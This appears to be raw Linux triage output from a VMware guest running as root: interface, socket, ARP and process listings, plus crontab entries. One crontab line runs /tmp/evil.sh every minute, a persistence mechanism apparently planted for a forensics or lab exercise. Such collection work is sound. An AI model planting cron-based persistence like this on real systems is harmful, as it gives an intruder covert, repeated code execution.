182.73.209.102ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.198.130  netmask 255.255.255.0  broadcast 192.168.198.255
        inet6 fe80::20c:29ff:fe71:e8a5  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:71:e8:a5  txqueuelen 1000  (Ethernet)
        RX packets 1834  bytes 1170698 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 662  bytes 96318 (94.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 31  bytes 3937 (3.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 31  bytes 3937 (3.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root
/home/bas/Documents/LINUX-JSON
* * * * * /tmp/evil.sh
*/5 * * * * echo 'Hello from SISA Team' > /tmp/SISA.log
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 ::1:631                 :::*                    LISTEN     
tcp6       0      0 :::9090                 :::*                    LISTEN     
unix  2      [ ACC ]     STREAM     LISTENING     10346    /run/systemd/journal/io.systemd.journal
unix  2      [ ACC ]     STREAM     LISTENING     18536    /run/user/1000/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     25441    /run/user/0/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     18548    /run/user/1000/bus
unix  2      [ ACC ]     STREAM     LISTENING     25451    /run/user/0/bus
unix  2      [ ACC ]     STREAM     LISTENING     18551    /run/user/1000/pulse/native
unix  2      [ ACC ]     STREAM     LISTENING     6770     /run/systemd/userdb/io.systemd.DynamicUser
unix  2      [ ACC ]     STREAM     LISTENING     18552    /run/user/1000/pipewire-0
unix  2      [ ACC ]     STREAM     LISTENING     6771     /run/systemd/io.systemd.ManagedOOM
unix  2      [ ACC ]     STREAM     LISTENING     18553    /run/user/1000/pipewire-0-manager
unix  2      [ ACC ]     STREAM     LISTENING     18591    /run/user/1000/keyring/control
unix  2      [ ACC ]     STREAM     LISTENING     6784     /run/systemd/journal/stdout
unix  2      [ ACC ]     STREAM     LISTENING     18949    /run/user/1000/keyring/ssh
unix  2      [ ACC ]     STREAM     LISTENING     28019    /run/user/0/at-spi/bus
unix  2      [ ACC ]     STREAM     LISTENING     19801    /run/user/1000/keyring/pkcs11
unix  2      [ ACC ]     STREAM     LISTENING     19965    /run/user/1000/at-spi/bus
unix  2      [ ACC ]     STREAM     LISTENING     75285    /run/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     19980    /run/user/1000/wayland-0
unix  2      [ ACC ]     STREAM     LISTENING     28203    /run/user/0/gvfsd/wsdd
unix  2      [ ACC ]     STREAM     LISTENING     656510   /run/user/0/gnupg/S.keyboxd
unix  2      [ ACC ]     STREAM     LISTENING     657091   /run/user/0/gnupg/S.gpg-agent
unix  2      [ ACC ]     STREAM     LISTENING     11242    /run/avahi-daemon/socket
unix  2      [ ACC ]     STREAM     LISTENING     657092   /run/user/0/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     657093   /run/user/0/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     11252    /run/cups/cups.sock
unix  2      [ ACC ]     STREAM     LISTENING     657094   /run/user/0/gnupg/S.gpg-agent.ssh
unix  2      [ ACC ]     STREAM     LISTENING     11253    /run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     658834   /run/user/0/gnupg/S.scdaemon
unix  2      [ ACC ]     STREAM     LISTENING     11256    /run/pcscd/pcscd.comm
unix  2      [ ACC ]     STREAM     LISTENING     12466    /run/ssh-unix-local/socket
unix  2      [ ACC ]     STREAM     LISTENING     13315    /run/.heim_org.h5l.kcm-socket
unix  2      [ ACC ]     STREAM     LISTENING     13316    /run/systemd/io.systemd.Hostname
unix  2      [ ACC ]     STREAM     LISTENING     15428    /run/gdm/dbus/dbus-daG8HFtA
unix  2      [ ACC ]     STREAM     LISTENING     15429    /run/gdm/dbus/dbus-bEyb7O0v
unix  2      [ ACC ]     STREAM     LISTENING     12668    /var/run/mcelog-client
unix  2      [ ACC ]     STREAM     LISTENING     12795    /var/run/lsm/ipc/simc
unix  2      [ ACC ]     STREAM     LISTENING     12796    /var/run/lsm/ipc/sim
unix  2      [ ACC ]     STREAM     LISTENING     12858    /var/run/vmware/guestServicePipe
unix  2      [ ACC ]     STREAM     LISTENING     25213    /run/user/1000/gvfsd/wsdd
unix  2      [ ACC ]     STREAM     LISTENING     19775    /tmp/.ICE-unix/2488
unix  2      [ ACC ]     STREAM     LISTENING     20635    /home/bas/.cache/ibus/dbus-QG9MGgrM
unix  2      [ ACC ]     STREAM     LISTENING     9097     /run/lvm/lvmpolld.socket
unix  2      [ ACC ]     STREAM     LISTENING     10627    /run/systemd/io.systemd.BootControl
unix  2      [ ACC ]     SEQPACKET  LISTENING     9098     /run/systemd/coredump
unix  2      [ ACC ]     STREAM     LISTENING     10628    /run/systemd/io.systemd.sysext
unix  2      [ ACC ]     STREAM     LISTENING     9099     /run/systemd/io.systemd.Credentials
unix  2      [ ACC ]     STREAM     LISTENING     19977    /tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     19979    /tmp/.X11-unix/X1
unix  2      [ ACC ]     SEQPACKET  LISTENING     9100     /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     9102     /run/systemd/userdb/io.systemd.Multiplexer
unix  2      [ ACC ]     STREAM     LISTENING     19774    @/tmp/.ICE-unix/2488
unix  2      [ ACC ]     STREAM     LISTENING     19976    @/tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     19978    @/tmp/.X11-unix/X1
unix  2      [ ACC ]     STREAM     LISTENING     11255    @ISCSID_UIP_ABSTRACT_NAMESPACE
unix  2      [ ACC ]     STREAM     LISTENING     11254    @ISCSIADM_ABSTRACT_NAMESPACE
Active Internet connections (servers and established)
udp        0      0 192.168.198.130:68      192.168.198.254:67      ESTABLISHED
Active UNIX domain sockets (servers and established)
Active Bluetooth connections (servers and established)
_gateway (192.168.198.2) at 00:50:56:fe:2c:0c [ether] on ens33
? (192.168.198.254) at 00:50:56:fd:af:0a [ether] on ens33
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.3  0.7  32284 13696 ?        Ss   16:48   0:11 /usr/lib/systemd/systemd --system --deserialize=95 rhgb
root           2  0.0  0.0      0     0 ?        S    16:48   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        S    16:48   0:00 [pool_workqueue_release]
root           4  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-rcu_gp]
root           5  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-sync_wq]
root           6  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-slub_flushwq]
root           7  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-netns]
root           9  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/0:0H-events_highpri]
root          11  0.0  0.0      0     0 ?        I    16:48   0:00 [kworker/u512:0-events_unbound]
root          12  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-mm_percpu_wq]
root          13  0.0  0.0      0     0 ?        I    16:48   0:00 [kworker/u512:1-ipv6_addrconf]
root          14  0.0  0.0      0     0 ?        I    16:48   0:00 [rcu_tasks_kthread]
root          15  0.0  0.0      0     0 ?        I    16:48   0:00 [rcu_tasks_rude_kthread]
root          16  0.0  0.0      0     0 ?        I    16:48   0:00 [rcu_tasks_trace_kthread]
root          17  0.0  0.0      0     0 ?        S    16:48   0:00 [ksoftirqd/0]
root          18  0.1  0.0      0     0 ?        I    16:48   0:05 [rcu_preempt]
root          19  0.0  0.0      0     0 ?        S    16:48   0:00 [rcu_exp_par_gp_kthread_worker/1]
root          20  0.0  0.0      0     0 ?        S    16:48   0:00 [rcu_exp_gp_kthread_worker]
root          21  0.0  0.0      0     0 ?        S    16:48   0:00 [migration/0]
root          22  0.0  0.0      0     0 ?        S    16:48   0:00 [idle_inject/0]
root          23  0.0  0.0      0     0 ?        S    16:48   0:00 [cpuhp/0]
root          24  0.0  0.0      0     0 ?        S    16:48   0:00 [cpuhp/1]
root          25  0.0  0.0      0     0 ?        S    16:48   0:00 [idle_inject/1]
root          26  0.0  0.0      0     0 ?        S    16:48   0:00 [migration/1]
root          27  0.0  0.0      0     0 ?        S    16:48   0:00 [ksoftirqd/1]
root          29  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/1:0H-events_highpri]
root          34  0.0  0.0      0     0 ?        S    16:48   0:00 [kdevtmpfs]
root          35  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-inet_frag_wq]
root          36  0.0  0.0      0     0 ?        S    16:48   0:00 [kauditd]
root          37  0.0  0.0      0     0 ?        S    16:48   0:00 [khungtaskd]
root          38  0.0  0.0      0     0 ?        S    16:48   0:00 [oom_reaper]
root          41  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-writeback]
root          42  0.0  0.0      0     0 ?        S    16:48   0:01 [kcompactd0]
root          43  0.0  0.0      0     0 ?        SN   16:48   0:00 [ksmd]
root          44  0.0  0.0      0     0 ?        SN   16:48   0:00 [khugepaged]
root          45  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-cryptd]
root          46  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kblockd]
root          47  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-blkcg_punt_bio]
root          48  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kintegrityd]
root          49  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/9-acpi]
root          51  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-tpm_dev_wq]
root          52  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-md]
root          53  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-md_bitmap]
root          54  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-edac-poller]
root          55  0.0  0.0      0     0 ?        S    16:48   0:00 [watchdogd]
root          56  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/1:1H-xfs-log/dm-0]
root          57  0.1  0.0      0     0 ?        S    16:48   0:04 [kswapd0]
root          65  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kthrotld]
root          70  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/24-pciehp]
root          71  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/25-pciehp]
root          72  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/26-pciehp]
root          73  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/27-pciehp]
root          74  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/28-pciehp]
root          75  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/29-pciehp]
root          76  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/30-pciehp]
root          77  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/31-pciehp]
root          78  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/32-pciehp]
root          79  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/33-pciehp]
root          80  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/34-pciehp]
root          81  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/35-pciehp]
root          82  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/36-pciehp]
root          83  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/37-pciehp]
root          84  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/38-pciehp]
root          85  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/39-pciehp]
root          86  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/40-pciehp]
root          87  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/41-pciehp]
root          88  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/42-pciehp]
root          89  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/43-pciehp]
root          90  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/44-pciehp]
root          91  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/45-pciehp]
root          92  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/46-pciehp]
root          93  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/47-pciehp]
root          94  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/48-pciehp]
root          95  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/49-pciehp]
root          96  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/50-pciehp]
root          97  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/51-pciehp]
root          98  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/52-pciehp]
root          99  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/53-pciehp]
root         100  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/54-pciehp]
root         101  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/55-pciehp]
root         102  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-acpi_thermal_pm]
root         103  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kmpath_rdacd]
root         104  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kaluad]
root         106  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-mld]
root         107  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-ipv6_addrconf]
root         108  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/0:1H-kblockd]
root         113  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kstrp]
root         120  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/u515:0]
root         122  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/u517:0-ttm]
root         177  0.7  0.0      0     0 ?        I    16:48   0:26 [kworker/u514:4-events_unbound]
root         315  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kmpathd]
root         316  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kmpath_handlerd]
root         454  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-iscsi_conn_cleanup]
root         458  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-tls-strp]
root         460  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-cnic_wq]
root         461  0.0  0.0      0     0 ?        S<   16:48   0:00 [bnx2i_thread/0]
root         462  0.0  0.0      0     0 ?        S<   16:48   0:00 [bnx2i_thread/1]
root         627  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-nvme-wq]
root         628  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-nvme-reset-wq]
root         629  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-nvme-delete-wq]
root         630  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-nvme-auth-wq]
root         631  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-nvme_tcp_wq]
root         663  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-mpt_poll_0]
root         664  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-mpt/0]
root         665  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-ata_sff]
root         666  0.0  0.0      0     0 ?        S    16:48   0:00 [scsi_eh_0]
root         667  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-scsi_tmf_0]
root         668  0.0  0.0      0     0 ?        S    16:48   0:00 [scsi_eh_1]
root         669  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-scsi_tmf_1]
root         672  0.0  0.0      0     0 ?        S    16:48   0:00 [scsi_eh_2]
root         673  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-scsi_tmf_2]
root         675  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/16-vmwgfx]
root         677  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-ttm]
root         759  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kdmflush/253:0]
root         765  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-kdmflush/253:1]
root         797  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfsalloc]
root         798  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs_mru_cache]
root         799  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-buf/dm-0]
root         800  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-conv/dm-0]
root         801  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-reclaim/dm-0]
root         802  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-blockgc/dm-0]
root         803  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-inodegc/dm-0]
root         804  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-log/dm-0]
root         805  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-cil/dm-0]
root         806  0.0  0.0      0     0 ?        S    16:48   0:01 [xfsaild/dm-0]
root         870  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/56-vmw_vmci]
root         871  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/57-vmw_vmci]
root         872  0.0  0.0      0     0 ?        S    16:48   0:00 [irq/58-vmw_vmci]
root         892  0.0  0.4  34780  8324 ?        Ss   16:48   0:00 /usr/lib/systemd/systemd-journald
root         907  0.0  0.2  15868  4340 ?        Ss   16:48   0:00 /usr/lib/systemd/systemd-userdbd
root         938  0.0  0.3  37560  6616 ?        Ss   16:48   0:00 /usr/lib/systemd/systemd-udevd
root         987  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-buf/sda2]
root         989  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-conv/sda2]
root         990  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-reclaim/sda2]
root         991  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-blockgc/sda2]
root         992  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-inodegc/sda2]
root         993  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-log/sda2]
root         994  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/R-xfs-cil/sda2]
root         995  0.0  0.0      0     0 ?        S    16:48   0:00 [xfsaild/sda2]
root        1027  0.0  0.1  94248  2520 ?        S<sl 16:48   0:00 /usr/sbin/auditd
root        1029  0.0  0.1   6484  2080 ?        S<   16:48   0:00 /usr/sbin/sedispatch
dbus        1051  0.0  0.1   9016  2832 ?        Ss   16:48   0:00 /usr/bin/dbus-broker-launch --scope system --audit
dbus        1070  0.0  0.2   8204  4336 ?        S    16:48   0:01 dbus-broker --log 4 --controller 9 --machine-id cc6480923f0440b7819eac4199c82ea8 --max-bytes 536870912 --max-fds 4096 --max-matches 131072 --audit
avahi       1071  0.0  0.1   6144  2856 ?        Ss   16:48   0:00 avahi-daemon: running [linux.local]
root        1074  0.0  0.1  80532  2788 ?        Ssl  16:48   0:00 /usr/sbin/irqbalance
libstor+    1075  0.0  0.0   2504  1236 ?        Ss   16:48   0:00 /usr/bin/lsmd -d
root        1076  0.0  0.0   2580  1176 ?        Ss   16:48   0:00 /usr/sbin/mcelog --daemon --foreground
polkitd     1077  0.0  0.6 607824 10420 ?        Ssl  16:48   0:01 /usr/lib/polkit-1/polkitd --no-debug --log-level=err
rtkit       1079  0.0  0.1  21320  2252 ?        SNsl 16:48   0:00 /usr/libexec/rtkit-daemon
root        1080  0.0  0.3 530304  5176 ?        Ssl  16:48   0:00 /usr/libexec/accounts-daemon
root        1081  0.0  0.2 527748  3708 ?        Ssl  16:48   0:00 /usr/libexec/switcheroo-control
root        1082  0.0  0.3  19012  6664 ?        Ss   16:48   0:01 /usr/lib/systemd/systemd-logind
root        1083  0.0  0.4 541872  7380 ?        Ssl  16:48   0:00 /usr/libexec/udisks2/udisksd
root        1084  0.0  0.2 530560  4572 ?        Ssl  16:48   0:00 /usr/libexec/upowerd
root        1085  0.0  0.1 239376  3384 ?        Ss   16:48   0:00 /usr/bin/VGAuthService -s
root        1086  0.2  0.2 463264  5024 ?        Ssl  16:48   0:08 /usr/bin/vmtoolsd
avahi       1088  0.0  0.0   6144   736 ?        S    16:48   0:00 avahi-daemon: chroot helper
chrony      1109  0.0  0.1  84592  2352 ?        S    16:48   0:00 /usr/sbin/chronyd -F 2
root        1144  0.0  0.2 390032  4556 ?        Ssl  16:48   0:00 /usr/sbin/ModemManager
root        1145  0.0  0.4 360508  8320 ?        Ssl  16:48   0:00 /usr/bin/python3 -sP /usr/sbin/firewalld --nofork --nopid
root        1158  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/u516:1]
root        1159  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/u516:2]
root        1161  0.0  0.1   4304  2104 ?        SNs  16:48   0:00 /usr/sbin/alsactl -s -n 19 -c -E ALSA_CONFIG_PATH=/etc/alsa/alsactl.conf --initfile=/lib/alsa/init/00main rdaemon
root        1203  0.0  0.5 553492  9588 ?        Ssl  16:48   0:00 /usr/sbin/NetworkManager --no-daemon
root        1212  0.0  0.3 252868  5432 ?        Ss   16:48   0:00 /usr/sbin/cupsd -l
root        1213  0.0  0.1   8760  2092 ?        Ss   16:48   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root        1220  0.0  0.6 488880 11376 ?        Ssl  16:48   0:01 /usr/bin/python3 -Es /usr/sbin/tuned -l -P
root        1229  0.0  0.1   4656  2012 ?        Ss   16:48   0:00 /usr/sbin/atd -f
root        1231  0.0  0.1 229740  2728 ?        Ss   16:48   0:00 /usr/sbin/crond -n
root        1266  0.0  0.2 167692  4960 ?        Ssl  16:48   0:00 /usr/sbin/rsyslogd -n
root        1278  0.0  0.2 531244  4496 ?        Ssl  16:48   0:00 /usr/sbin/gdm
root        1353  0.0  0.4 487324  7140 ?        Ssl  16:48   0:00 /usr/bin/python3 -Es /usr/sbin/tuned-ppd -l
colord      1818  0.0  0.3 533872  5356 ?        Ssl  16:48   0:00 /usr/libexec/colord
root        2143  0.0  0.1  15240  2500 ?        Ss   16:48   0:00 /usr/sbin/wpa_supplicant -c /etc/wpa_supplicant/wpa_supplicant.conf -u -s
root        2293  0.0  0.0      0     0 ?        I<   16:48   0:00 [kworker/u517:1]
root        2359  0.0  0.3 458948  5592 ?        Sl   16:48   0:00 gdm-session-worker [pam/gdm-password]
bas         2371  0.0  0.6  23748 10408 ?        Ss   16:48   0:00 /usr/lib/systemd/systemd --user
bas         2374  0.0  0.0  14076   780 ?        S    16:48   0:00 (sd-pam)
bas         2391  0.0  0.2 534140  3920 ?        Sl   16:48   0:00 /usr/bin/gnome-keyring-daemon --daemonize --login
bas         2427  0.0  0.2 453592  3500 tty2     Ssl+ 16:49   0:00 /usr/libexec/gdm-wayland-session /usr/bin/gnome-session
bas         2430  0.0  0.1   8656  2508 ?        Ss   16:49   0:00 /usr/bin/dbus-broker-launch --scope user
bas         2431  0.0  0.1   6880  3352 ?        S    16:49   0:00 dbus-broker --log 4 --controller 9 --machine-id cc6480923f0440b7819eac4199c82ea8 --max-bytes 100000000000000 --max-fds 25000000000000 --max-matches 5000000000
bas         2433  0.0  0.3 555372  6164 tty2     Sl+  16:49   0:00 /usr/libexec/gnome-session-binary
bas         2484  0.0  0.1 307900  2988 ?        Ssl  16:49   0:00 /usr/libexec/gnome-session-ctl --monitor
bas         2488  0.0  0.4 1047700 7864 ?        Ssl  16:49   0:00 /usr/libexec/gnome-session-binary --systemd-service --session=gnome
bas         2513 10.5 12.9 4204388 222540 ?      Ssl  16:49   6:17 /usr/bin/gnome-shell
bas         2522  0.0  0.3 535380  5472 ?        Ssl  16:49   0:00 /usr/libexec/gvfsd
bas         2528  0.0  0.2 752392  4604 ?        Sl   16:49   0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f
bas         2566  0.0  0.2 380352  5140 ?        Ssl  16:49   0:00 /usr/libexec/at-spi-bus-launcher
bas         2572  0.0  0.1   8528  2268 ?        S    16:49   0:00 /usr/bin/dbus-broker-launch --config-file=/usr/share/defaults/at-spi2/accessibility.conf --scope user
bas         2573  0.0  0.1   4760  2220 ?        S    16:49   0:00 dbus-broker --log 4 --controller 9 --machine-id cc6480923f0440b7819eac4199c82ea8 --max-bytes 100000000000000 --max-fds 6400000 --max-matches 5000000000
bas         2574  0.0  0.2 233532  4916 ?        Ssl  16:49   0:00 /usr/libexec/at-spi2-registryd --use-gnome-session
bas         2579  0.0  0.3 662628  5712 ?        Ssl  16:49   0:00 /usr/libexec/gnome-shell-calendar-server
bas         2580  0.0  0.2 527220  3800 ?        Ssl  16:49   0:00 /usr/libexec/xdg-permission-store
bas         2604  0.0  0.4 690048  7084 ?        Ssl  16:49   0:00 /usr/libexec/evolution-source-registry
bas         2633  0.0  0.4 2901500 8564 ?        Ssl  16:49   0:00 /usr/bin/gjs -m /usr/share/gnome-shell/org.gnome.Shell.Notifications
bas         2635  0.1  0.3 606632  5672 ?        Ssl  16:49   0:04 /usr/bin/ibus-daemon --panel disable
bas         2636  0.0  0.2 601448  4500 ?        Ssl  16:49   0:00 /usr/libexec/gsd-a11y-settings
bas         2638  0.0  0.4 780176  7404 ?        Ssl  16:49   0:00 /usr/libexec/gsd-color
bas         2639  0.0  0.3 618240  5628 ?        Ssl  16:49   0:00 /usr/libexec/gsd-datetime
bas         2642  0.0  0.3 677548  5424 ?        Ssl  16:49   0:00 /usr/libexec/gsd-housekeeping
bas         2643  0.0  0.4 778860  7240 ?        Ssl  16:49   0:00 /usr/libexec/gsd-keyboard
bas         2644  0.0  0.6 1129184 11200 ?       Ssl  16:49   0:00 /usr/libexec/gsd-media-keys
bas         2645  0.0  0.4 780064  8328 ?        Ssl  16:49   0:00 /usr/libexec/gsd-power
bas         2653  0.0  0.3 545212  6744 ?        Ssl  16:49   0:00 /usr/libexec/gsd-print-notifications
bas         2657  0.0  0.5 989324  9020 ?        Sl   16:49   0:00 /usr/libexec/evolution-data-server/evolution-alarm-notify
bas         2661  0.0  0.2 305432  4884 ?        Sl   16:49   0:00 /usr/libexec/gsd-disk-utility-notify
bas         2668  0.2  0.7 580336 13340 ?        Sl   16:49   0:08 /usr/bin/vmtoolsd -n vmusr --uinputFd 3
bas         2684  0.0  0.2 749128  4364 ?        Ssl  16:49   0:00 /usr/libexec/gsd-rfkill
bas         2686  0.0  0.2 527508  4164 ?        Ssl  16:49   0:00 /usr/libexec/gsd-screensaver-proxy
bas         2688  0.0  0.3 759416  6148 ?        Ssl  16:49   0:00 /usr/libexec/gsd-sharing
bas         2696  0.0  0.2 603420  4616 ?        Ssl  16:49   0:00 /usr/libexec/gsd-smartcard
bas         2717  0.0  0.2 608480  4896 ?        Ssl  16:49   0:00 /usr/libexec/gsd-sound
bas         2720  0.0  0.2 750812  4728 ?        Ssl  16:49   0:00 /usr/libexec/gsd-usb-protection
bas         2721  0.0  0.8 1292404 14044 ?       Sl   16:49   0:01 /usr/bin/gnome-software --gapplication-service
bas         2723  0.0  0.4 854160  7292 ?        Ssl  16:49   0:00 /usr/libexec/gsd-wacom
bas         2753  0.0  0.4 731440  7332 ?        Ssl  16:49   0:00 /usr/libexec/goa-daemon
bas         2754  0.0  0.3 1110976 5872 ?        Ssl  16:49   0:00 /usr/libexec/evolution-calendar-factory
bas         2777  0.0  0.2 528404  3604 ?        Sl   16:49   0:00 /usr/libexec/ibus-dconf
bas         2779  0.0  0.4 789488  7884 ?        Sl   16:49   0:02 /usr/libexec/ibus-extension-gtk3
bas         2805  0.0  0.4 685968  7088 ?        Ssl  16:49   0:00 /usr/libexec/gvfs-udisks2-volume-monitor
bas         2813  0.0  0.2 528356  4328 ?        Ssl  16:49   0:00 /usr/libexec/ibus-portal
bas         2814  0.0  0.3 615364  5668 ?        Ssl  16:49   0:00 /usr/libexec/goa-identity-service
bas         2863  0.0  0.5 2901576 8584 ?        Ssl  16:49   0:00 /usr/bin/gjs -m /usr/share/gnome-shell/org.gnome.ScreenSaver
bas         2868  0.0  0.2 527812  3832 ?        Ssl  16:49   0:00 /usr/libexec/gvfs-mtp-volume-monitor
bas         2912  0.0  0.2 529408  4200 ?        Ssl  16:49   0:00 /usr/libexec/gvfs-gphoto2-volume-monitor
bas         2929  0.0  0.4 1037304 6980 ?        Ssl  16:49   0:00 /usr/libexec/evolution-addressbook-factory
bas         2930  0.0  0.2 527492  3908 ?        Ssl  16:49   0:00 /usr/libexec/gvfs-goa-volume-monitor
bas         2938  0.0  0.4 205072  7772 ?        S    16:49   0:00 /usr/bin/Xwayland :0 -rootless -noreset -accessx -core -auth /run/user/1000/.mutter-Xwaylandauth.PDDCB3 -listenfd 4 -listenfd 5 -displayfd 6 -initfd 7 -byteswappedclients -enable-ei-portal
sssd        2946  0.0  0.2 243888  4144 ?        Ss   16:49   0:00 /usr/libexec/sssd/sssd_kcm --logger=files
bas         3012  0.0  0.3 641504  6480 ?        Sl   16:49   0:00 /usr/libexec/gsd-printer
bas         3013  0.0  0.2 454700  5044 ?        Sl   16:49   0:01 /usr/libexec/ibus-engine-simple
bas         3038  0.0  0.4 323760  8060 ?        S<sl 16:49   0:00 /usr/bin/pipewire
